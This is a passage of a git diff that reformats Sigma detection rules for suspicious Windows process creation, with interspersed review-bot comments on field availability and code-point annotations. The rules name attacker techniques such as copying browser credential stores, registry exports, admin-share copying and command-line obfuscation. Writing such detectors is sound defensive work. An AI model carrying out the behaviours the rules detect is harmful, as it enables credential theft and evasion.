@@ -19,25 +18,25 @@ detection: EventID: 4688 Channel: Security selection_stream: - CommandLine|contains: 'txt:' + CommandLine|contains: 'txt:' selection_tools_type: - CommandLine|contains|all: + CommandLine|contains|all: - 'type ' - ' > ' selection_tools_makecab: - CommandLine|contains|all: + CommandLine|contains|all: - 'makecab ' - .cab selection_tools_reg: - CommandLine|contains|all: + CommandLine|contains|all: - 'reg ' - ' export ' selection_tools_regedit: - CommandLine|contains|all: + CommandLine|contains|all: - 'regedit ' - ' /E ' selection_tools_esentutl: - CommandLine|contains|all: + CommandLine|contains|all: - 'esentutl ' - ' /y ' - ' /d ' diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml b/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml index 34ad13b3c..42d5ee6af 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml @@ -1,8 +1,7 @@ title: Always Install Elevated Windows Installer id: cd951fdc-4b2f-47f5-ba99-a33bf61e3770 status: experimental -description: Detects Windows Installer service (msiexec.exe) trying to install MSI - packages with SYSTEM privilege +description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege references: - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community 
@@ -19,22 +18,22 @@ detection: EventID: 4688 Channel: Security selection_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI selection_image_1: - NewProcessName|contains|all: + NewProcessName|contains|all: - \Windows\Installer\ - msi - NewProcessName|endswith: tmp + NewProcessName|endswith: tmp selection_image_2: - NewProcessName|endswith: \msiexec.exe + NewProcessName|endswith: \msiexec.exe MandatoryLabel: S-1-16-16384 filter_installer: ParentProcessName: C:\Windows\System32\services.exe filter_repair: - - CommandLine|endswith: \system32\msiexec.exe /V - - ParentCommandLine|endswith: \system32\msiexec.exe /V + - CommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" + - ParentCommandLine|endswith: \system32\msiexec.exe /V # ignore "repair option" filter_sophos: ParentProcessName|startswith: C:\ProgramData\Sophos\ filter_avira: @@ -47,8 +46,7 @@ detection: ParentProcessName|startswith: - C:\Program Files\Google\Update\ - C:\Program Files (x86)\Google\Update\ - condition: process_creation and (1 of selection_image_* and selection_user and - not 1 of filter_*) + condition: process_creation and (1 of selection_image_* and selection_user and not 1 of filter_*) falsepositives: - System administrator usage - Anti virus products diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml b/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml index cdf4dba2a..b042cd6ae 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_appx_execution.yml 
@@ -1,9 +1,7 @@ title: Potentially Suspicious Windows App Activity id: f91ed517-a6ba-471d-9910-b3b4a398c0f3 status: experimental -description: Detects potentially suspicious child process of applications launched - from inside the WindowsApps directory. This could be a sign of a rogue ".appx" - package installation/execution +description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution references: - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/ - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -20,9 +18,11 @@ detection: EventID: 4688 Channel: Security selection_parent: + # GrandParentImage|endswith: '\sihost.exe' ParentProcessName|contains: C:\Program Files\WindowsApps\ selection_susp_img: - NewProcessName|endswith: + NewProcessName|endswith: + # You can add more LOLBINs - \cmd.exe - \cscript.exe - \mshta.exe @@ -32,19 +32,19 @@ detection: - \rundll32.exe - \wscript.exe selection_susp_cli: - CommandLine|contains: + # You can add more potentially suspicious keywords + CommandLine|contains: - cmd /c - Invoke- - Base64 filter_optional_terminal: ParentProcessName|contains: :\Program Files\WindowsApps\Microsoft.WindowsTerminal ParentProcessName|endswith: \WindowsTerminal.exe - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \cmd.exe - \pwsh.exe - condition: process_creation and (selection_parent and 1 of selection_susp_* and - not 1 of filter_optional_*) + condition: process_creation and (selection_parent and 1 of selection_susp_* and not 1 of filter_optional_*) falsepositives: - Legitimate packages that make use of external binaries such as Windows Terminal level: medium 
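Review bot: The commented-out line `# GrandParentImage|endswith: '\sihost.exe'` added under selection_parent carries no explanation, so a maintainer cannot tell whether it is a planned tightening or a field that the Security EventID 4688 log source simply does not provide (the event exposes ParentProcessName but, to my knowledge, nothing about the grandparent). Either drop it or annotate it, e.g. `# GrandParentImage is not available in EventID 4688; kept for reference only`. The `# You can add more LOLBINs` and `# You can add more potentially suspicious keywords` comments are fine as tuning hints.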
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml index 88d1de483..d4ddb7a53 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml @@ -1,9 +1,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e status: test -description: The .SettingContent-ms file type was introduced in Windows 10 and allows - a user to create "shortcuts" to various Windows 10 setting pages. These files - are simply XML and contain paths to various Windows 10 settings binaries. +description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 author: Sreeman @@ -22,9 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: .SettingContent-ms + CommandLine|contains: .SettingContent-ms filter: - CommandLine|contains: immersivecontrolpanel + CommandLine|contains: immersivecontrolpanel condition: process_creation and (selection and not filter) fields: - ParentProcess diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml b/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml index 827b9e323..394aa9f72 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml 
@@ -1,10 +1,7 @@ title: Phishing Pattern ISO in Archive id: fcdf69e5-a3d3-452a-9724-26f2308bf2b1 status: test -description: Detects cases in which an ISO files is opend within an archiver like - 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files - in archives as email attachments to bypass certain filters and protective measures - (mark of web) +description: Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web) references: - https://twitter.com/1ZRR4H/status/1534259727059787783 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ @@ -25,13 +22,12 @@ detection: - \Winrar.exe - \7zFM.exe - \peazip.exe - NewProcessName|endswith: + NewProcessName|endswith: - \isoburn.exe - \PowerISO.exe - \ImgBurn.exe condition: process_creation and selection falsepositives: - - Legitimate cases in which archives contain ISO or IMG files and the user opens - the archive and the image via clicking and not extraction + - Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml b/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml index bcc9a6db6..e9ac4def5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_automated_collection.yml 
@@ -1,8 +1,7 @@ title: Automated Collection Command Prompt id: f576a613-2392-4067-9d1a-9345fb58d8d1 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data. +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md @@ -22,7 +21,7 @@ detection: EventID: 4688 Channel: Security selection_ext: - CommandLine|contains: + CommandLine|contains: - .doc - .docx - .xls @@ -33,13 +32,13 @@ detection: - .pdf - .txt selection_other_dir: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /b ' - ' /s ' selection_other_findstr: OriginalFileName: FINDSTR.EXE - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /si ' condition: process_creation and (selection_ext and 1 of selection_other_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml b/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml index 4faa4e6d3..b25ae0896 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml 
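Review bot: selection_other_findstr ANDs `OriginalFileName: FINDSTR.EXE` with its CommandLine list, yet this rule's log source is the Security EventID 4688 event, which as far as I know carries no OriginalFileName field (that is a Sysmon process-creation field); if so, the selection can never match and `1 of selection_other_*` silently reduces to selection_other_dir. Other rules in this patch express the same intent as an OR list of `- NewProcessName|endswith:` and `- OriginalFileName:` alternatives; the same should be done here, adding `\findstr.exe` as a NewProcessName alternative and moving the CommandLine test into its own selection so the AND with the image test survives, with the condition adjusted accordingly. Whether the converter intentionally keeps unmapped fields is not visible from this diff, so this should be confirmed against the conversion tooling.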
@@ -1,19 +1,13 @@ title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments id: a7c3d773-caef-227e-a7e7-c2f13c622329 related: - - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add - type: obsoletes + - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add + type: obsoletes status: experimental -description: 'Detects attackers using tooling with bad opsec defaults. - - E.g. spawning a sacrificial process to inject a capability into the process without - taking into account how the process is normally run. - - One trivial example of this is using rundll32.exe without arguments as a sacrificial - process (default in CS, now highlighted by c2lint), running WerFault without arguments - (Kraken - credit am0nsec), and other examples. - - ' +description: | + Detects attackers using tooling with bad opsec defaults. + E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. + One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. references: - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/ - https://www.cobaltstrike.com/help-opsec @@ -22,8 +16,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron - Systems), Christian Burkard (Nextron Systems) +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2020/10/23 modified: 2023/12/02 tags: 
@@ -37,34 +30,34 @@ detection: EventID: 4688 Channel: Security selection_werfault: - CommandLine|endswith: WerFault.exe - NewProcessName|endswith: \WerFault.exe + CommandLine|endswith: WerFault.exe + NewProcessName|endswith: \WerFault.exe selection_rundll32: - CommandLine|endswith: rundll32.exe - NewProcessName|endswith: \rundll32.exe + CommandLine|endswith: rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_regsvcs: - CommandLine|endswith: regsvcs.exe - NewProcessName|endswith: \regsvcs.exe + CommandLine|endswith: regsvcs.exe + NewProcessName|endswith: \regsvcs.exe selection_regasm: - CommandLine|endswith: regasm.exe - NewProcessName|endswith: \regasm.exe + CommandLine|endswith: regasm.exe + NewProcessName|endswith: \regasm.exe selection_regsvr32: - CommandLine|endswith: regsvr32.exe - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_edge_update: ParentProcessName|contains|all: - :\Users\ - \AppData\Local\Microsoft\EdgeUpdate\Install\{ filter_optional_chrome_installer: + # As reported in https://github.com/SigmaHQ/sigma/issues/4570 ParentCommandLine|contains: --uninstall --channel=stable - CommandLine|endswith: rundll32.exe + CommandLine|endswith: rundll32.exe ParentProcessName|contains|all: - :\Users\ - \AppData\Local\Google\Chrome\Application\ ParentProcessName|endswith: \Installer\setup.exe - NewProcessName|endswith: \rundll32.exe - condition: process_creation and (1 of selection_* and not 1 of filter_main_* and - not 1 of filter_optional_*) + NewProcessName|endswith: \rundll32.exe + condition: process_creation and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml b/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml index ff1799432..f5a5c7332 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml @@ -1,15 +1,13 @@ title: Suspicious Child Process Created as System id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d status: test -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE accounts +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://github.com/antonioCoco/RogueWinRM - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 -author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research - (OTR) +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) date: 2019/10/26 modified: 2022/12/15 tags: @@ -30,17 +28,17 @@ detection: ParentUser|endswith: - \NETWORK SERVICE - \LOCAL SERVICE - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - SubjectUserName|endswith: + SubjectUserName|endswith: # System - \SYSTEM - - "\\Syst\xE8me" - - "\\\u0421\u0418\u0421\u0422\u0415\u041C\u0410" + - \Système + - \СИСТЕМА MandatoryLabel: S-1-16-16384 filter_rundll32: - CommandLine|contains: DavSetCookie - NewProcessName|endswith: \rundll32.exe + CommandLine|contains: DavSetCookie + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml index 99fa31b7e..8c3c0ea45 100644 
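Review bot: The new trailing comment `# System` on `SubjectUserName|endswith:` is too thin to explain the now-unescaped values `\Système` and `\СИСТЕМА`, which a reader may otherwise take for encoding artefacts. Suggest `SubjectUserName|endswith: # SYSTEM account name in English, French and Russian` so the localized variants are documented the same way the `# covers many language settings` comment documents `AUTHORI`/`AUTORI`. Note the plain scalars rely on YAML not treating the backslash as an escape outside double quotes, which is consistent with the other rules in this patch.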
--- a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml @@ -4,8 +4,8 @@ status: test description: Detects potential commandline obfuscation using known escape characters references: - https://twitter.com/vysecurity/status/885545634958385153 - - https://twitter.com/Hexacorn/status/885553465417756673 - - https://twitter.com/Hexacorn/status/885570278637678592 + - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link + - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ author: juju4 @@ -22,7 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # - # no TAB modifier in sigmac yet, so this matches (or TAB in elasticsearch backends without DSL queries) - h^t^t^p - h"t"t"p condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml index 9011d4762..5d1481c47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml 
@@ -1,16 +1,12 @@ title: Potential Commandline Obfuscation Using Unicode Characters id: e0552b19-5a83-4222-b141-b36184bb8d79 related: - - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 - type: obsoletes + - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 + type: obsoletes status: test -description: 'Detects potential commandline obfuscation using unicode characters. - - Adversaries may attempt to make an executable or file difficult to discover or - analyze by encrypting, encoding, or otherwise obfuscating its contents on the - system or in transit. - - ' +description: | + Detects potential commandline obfuscation using unicode characters. + Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http @@ -28,27 +24,27 @@ detection: EventID: 4688 Channel: Security selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 selection_other: - CommandLine|contains: - - "\xE2" - - "\u20AC" - - "\xA3" - - "\xAF" - - "\xAE" - - "\xB5" - - "\xB6" + CommandLine|contains: + - â + - € + - £ + - ¯ + - ® + - µ + - ¶ condition: process_creation and (1 of selection_*) falsepositives: - Unknown 
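Review bot: The code-point comments on the two slash alternatives are wrong: the removed lines show these values were `\u2215` and `\u2044`, so the new lines should read `- ∕ # 0x2215` (DIVISION SLASH) and `- ⁄ # 0x2044` (FRACTION SLASH); 0x22FF and 0x206F are unrelated code points and would send anyone verifying the rule to the wrong characters. The comments on the spacing-modifier and hyphen selections do agree with their removed escapes. For selection_other, a short comment noting that these single Latin-1 characters may also appear in mis-decoded text would help tuners, since that selection carries no annotation at all.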
diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml index dab221095..09c4b1242 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml @@ -1,8 +1,7 @@ title: Potential Command Line Path Traversal Evasion Attempt id: 1327381e-6ab0-4f38-b583-4c1b8346a56b status: experimental -description: Detects potential evasion or obfuscation attempts using bogus path traversal - via the commandline +description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 @@ -20,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - \..\Windows\ - \..\System32\ - \..\..\ - NewProcessName|contains: \Windows\ + NewProcessName|contains: \Windows\ selection_2: - CommandLine|contains: .exe\..\ + CommandLine|contains: .exe\..\ filter_optional_google_drive: - CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ + CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ filter_optional_citrix: - CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ + CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - Google Drive diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml index 5645ab410..7731061e5 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml @@ -1,19 +1,13 @@ title: Potential Browser Data Stealing id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b related: - - id: fc028194-969d-4122-8abe-0470d5b8f12f - type: derived + - id: fc028194-969d-4122-8abe-0470d5b8f12f + type: derived status: experimental -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: Nasreddine Bencherchali (Nextron Systems) 
@@ -30,23 +24,23 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - CommandLine|contains: - - copy-item - - 'copy ' - - 'cpi ' - - ' cp ' - - 'move ' - - move-item - - ' mi ' - - ' mv ' - - NewProcessName|endswith: - - \xcopy.exe - - \robocopy.exe - - OriginalFileName: - - XCOPY.EXE - - robocopy.exe + - CommandLine|contains: + - copy-item + - 'copy ' + - 'cpi ' + - ' cp ' + - 'move ' + - move-item + - ' mi ' + - ' mv ' + - NewProcessName|endswith: + - \xcopy.exe + - \robocopy.exe + - OriginalFileName: + - XCOPY.EXE + - robocopy.exe selection_path: - CommandLine|contains: + CommandLine|contains: - \Amigo\User Data - \BraveSoftware\Brave-Browser\User Data - \CentBrowser\User Data diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml index f39c5deb1..107d2f632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml 
@@ -1,15 +1,13 @@ title: Copy From Or To Admin Share Or Sysvol Folder id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 status: test -description: Detects a copy command or a copy utility execution to or from an Admin - share or remote +description: Detects a copy command or a copy utility execution to or from an Admin share or remote references: - https://twitter.com/SBousseaden/status/1211636381086339073 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, - Zach Stanford @svch0st, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali date: 2019/12/30 modified: 2023/11/15 tags: @@ -27,30 +25,30 @@ detection: EventID: 4688 Channel: Security selection_target: - CommandLine|contains: + CommandLine|contains: - \\\\*$ - \Sysvol\ selection_other_tools: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_cmd_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: copy + CommandLine|contains: copy selection_pwsh_img: - - NewProcessName|contains: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|contains: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - copy-item - 'copy ' - 'cpi ' 
@@ -59,8 +57,7 @@ detection: - move-item - ' mi ' - ' mv ' - condition: process_creation and (selection_target and (selection_other_tools or - all of selection_cmd_* or all of selection_pwsh_*)) + condition: process_creation and (selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)) falsepositives: - Administrative scripts level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml index a09426e26..c9610dd27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml 
@@ -1,23 +1,17 @@ title: Suspicious Copy From or To System Directory id: fff9d2b7-e11c-4a69-93d3-40ef66189767 related: - - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 - type: derived + - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 + type: derived status: test -description: 'Detects a suspicious copy operation that tries to copy a program from - system (System32, SysWOW64, WinSxS) directories to another on disk. - - Often used to move LOLBINs such as ''certutil'' or ''desktopimgdownldr'' to a - different location with a different name in order to bypass detections based on - locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. + Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ -author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) date: 2020/07/03 modified: 2023/08/29 tags: 
@@ -31,34 +25,33 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains: 'copy ' - NewProcessName|endswith: \cmd.exe + CommandLine|contains: 'copy ' + NewProcessName|endswith: \cmd.exe selection_pwsh: - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_other: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE target: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS condition: process_creation and (1 of selection_* and target) falsepositives: - - Depend on scripts and administrative tools used in the monitored environment - (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) - - When cmd.exe and xcopy.exe are called directly + - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) + - When cmd.exe and xcopy.exe are called directly # C:\Windows\System32\cmd.exe /c copy file1 file2 - When the command contains the keywords but not in the correct order level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml index b1744a7ad..8e287bd63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml 
